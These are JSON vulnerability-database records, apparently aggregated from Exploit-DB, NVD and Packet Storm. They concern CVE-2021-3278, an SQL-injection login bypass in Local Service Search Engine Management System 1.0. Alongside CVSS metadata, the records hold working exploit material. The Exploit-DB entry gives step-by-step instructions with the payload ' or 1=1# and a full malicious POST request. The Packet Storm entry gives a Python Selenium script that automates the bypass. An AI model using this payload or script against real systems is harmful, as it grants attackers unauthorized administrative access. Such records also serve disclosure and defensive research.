{"id": "EDB-ID:49163", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass", "description": "", "published": "2020-12-02T00:00:00", "modified": "2020-12-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.exploit-db.com/exploits/49163", "reporter": "Aditya Wakhlu", "references": [], "cvelist": ["2021-3278", "CVE-2021-3278"], "immutableFields": [], "lastseen": "2022-05-13T17:42:21", "viewCount": 336, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-3278"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162919"]}], "rev": 4}, "score": {"value": 5.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-25004", "CVE-2020-25005", "CVE-2020-25006"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162919"]}]}, "exploitation": null, "vulnersScore": 5.6}, "_state": {"dependencies": 0}, "_internal": {}, "sourceHref": 
"https://www.exploit-db.com/download/49163", "sourceData": "# Exploit Title: Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass\r\n# Date: 21/11/2020\r\n# Exploit Author: Aditya Wakhlu\r\n# Vendor Homepage: https://www.sourcecodester.com/php/14607/local-service-search-engine-management-system-using-phpmysqli-source-code.html\r\n# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lssems.zip\r\n# Version: 1.0\r\n# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4\r\n# CVE: CVE-2021-3278\r\n\r\nStep 1: Open the URL http://localhost:8080/lssems/admin/login.php\r\nStep 2: use payload Aditya' or 1=1# in user and password field\r\n\r\nMalicious Request:::\r\n\r\nPOST /lssems/admin/ajax.php?action=login HTTP/1.1\r\nHost: localhost:8080\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 49\r\nOrigin: http://localhost:8080\r\nConnection: close\r\nReferer: http://localhost:8080/lssems/admin/login.php\r\nCookie: PHPSESSID=mpqu31slfcd7fjc89gm9veb1o3\r\n\r\nusername=Aditya'+or+1%3D1%23&password=Aditya'+or+1%3D1%23", "osvdbidlist": [], "exploitType": "webapps", "verified": false}
{"cve": [{"lastseen": "2022-04-26T20:14:31", "description": "Local Service Search Engine Management System 1.0 is vulnerable to authentication bypass via SQL injection. Using this vulnerability, an attacker can bypass the login page.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-26T18:16:00", "type": "cve", "title": "CVE-2021-3278", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3278"], "modified": "2022-04-26T16:33:00", "cpe": ["cpe:/a:local_services_search_engine_management_system_project:local_services_search_engine_management_system:1.0"], "id": "CVE-2021-3278", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3278", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:local_services_search_engine_management_system_project:local_services_search_engine_management_system:1.0:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2021-06-03T15:19:56", "description": "", "published": "2021-06-02T00:00:00", "type": "packetstorm", "title": "Local Service Search Engine Management System 1.0 SQL Injection", 
"bulletinFamily": "exploit", "cvelist": ["CVE-2021-3278"], "modified": "2021-06-02T00:00:00", "id": "PACKETSTORM:162919", "href": "https://packetstormsecurity.com/files/162919/Local-Service-Search-Engine-Management-System-1.0-SQL-Injection.html", "sourceData": "`# Exploit Title: SQL injection, bypass the login page, Local Service Search Engine Management System 1.0 \n# Author: @nu11secur1ty \n# Testing and Debugging: @nu11secur1ty \n# Date: 06.02.2021 \n# Vendor: https://www.sourcecodester.com/php/14607/local-service-search-engine-management-system-using-phpmysqli-source-code.html \n# Link: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3278/lssems.zip \n# CVE: CVE-2021-3278 \n# Proof: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3278 \n \n[+] Exploit Source: \n \n#!/usr/bin/python3 \n# Author: @nu11secur1ty \n# Debug: @nu11secur1ty \n# CVE: CVE-2021-3278 \n \nfrom selenium import webdriver \nimport time \n \n \n#enter the link to the website you want to automate login. 
\nwebsite_link=\"http://192.168.1.4/lssems/admin/login.php\" \n \n#enter your login username SQL bling injection \nusername=\"nu11secur1ty' or 1=1#\" \n#enter your login password SQL bling injection \npassword=\"nu11secur1ty' or 1=1#\" \n \n# test and proof the SQL injection \n# user: admin \n# password: password \n \n#enter the element for username input field \nelement_for_username=\"username\" \n#enter the element for password input field \nelement_for_password=\"password\" \n \n#enter the element for submit button by class \nelement_for_submit=\"btn-sm.btn-block.btn-wave.col-md-4.btn-primary\" \n \n#browser = webdriver.Safari() #for macOS users[for others use chrome vis \nchromedriver] \nbrowser = webdriver.Chrome() #uncomment this line,for chrome users \n#browser = webdriver.Firefox() #uncomment this line,for chrome users \n \nbrowser.get((website_link)) \n \ntry: \nusername_element = browser.find_element_by_name(element_for_username) \nusername_element.send_keys(username) \npassword_element = browser.find_element_by_name(element_for_password) \npassword_element.send_keys(password) \ntime.sleep(3) \nsignInButton = browser.find_element_by_class_name(element_for_submit) \nsignInButton.click() \n \nprint(\"payload is deployed NOW, you have SQL Authentication Bypass =)...\\n\") \n \nexcept Exception: \n#### This exception occurs if the element are not found in the webpage. 
\nprint(\"Some error occured :(\") \n \n \n--------------------------------- \n \n# Exploit Title: SQL injection, bypass the login page, Local Service Search \nEngine Management System 1.0 \n# Date: 06.02.2021 \n# Exploit Authotr idea: @nu11secur1ty \n# Exploit Debugging: @nu11secur1ty \n# Vendor Homepage: \nhttps://www.sourcecodester.com/php/14607/local-service-search-engine-management-system-using-phpmysqli-source-code.html \n# Software Link: \nhttps://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3278/lssems.zip \n# Steps to Reproduce: \nhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3278 \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/162919/localssems10-sql.txt"}]}